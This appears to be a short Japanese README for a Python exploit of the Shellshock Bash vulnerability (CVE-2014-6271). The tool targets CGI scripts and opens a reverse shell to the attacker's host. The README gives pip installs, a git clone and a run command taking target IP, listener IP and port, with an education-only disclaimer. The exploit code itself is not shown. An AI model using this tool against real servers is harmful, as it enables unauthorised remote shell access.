
Python用のCVE-2014-6271(Shellshock)エクスプロイト。脆弱なCGIスクリプトを標的とし、リバースシェルハンドラを備え、HTTP/HTTPS、カスタムパス、プロキシに対応。
これは、GNU Bash に影響を与える Shellshock 脆弱性 (CVE-2014-6271) に対する Python エクスプロイトです。このエクスプロイトは、脆弱な Web サーバー上の CGI スクリプト を標的とし、攻撃者のマシンへの リバースシェル を確立します。
CVE-2014-6271
このツールは、教育目的および倫理的な目的にのみ使用されることを意図しています。
sudo python3 -m pip install pwntools
sudo python3 -m pip install requests
git clone https://github.com/knightc0de/Shellshock_vuln_Exploit.git
cd Shellshock_vuln_Exploit/
chmod +x CVE-2014-6271.py
python3 CVE-2014-6271 --rhost <target_ip> --lhost <your_ip> --lport <your_port> --pages /cgi-bin/test.cg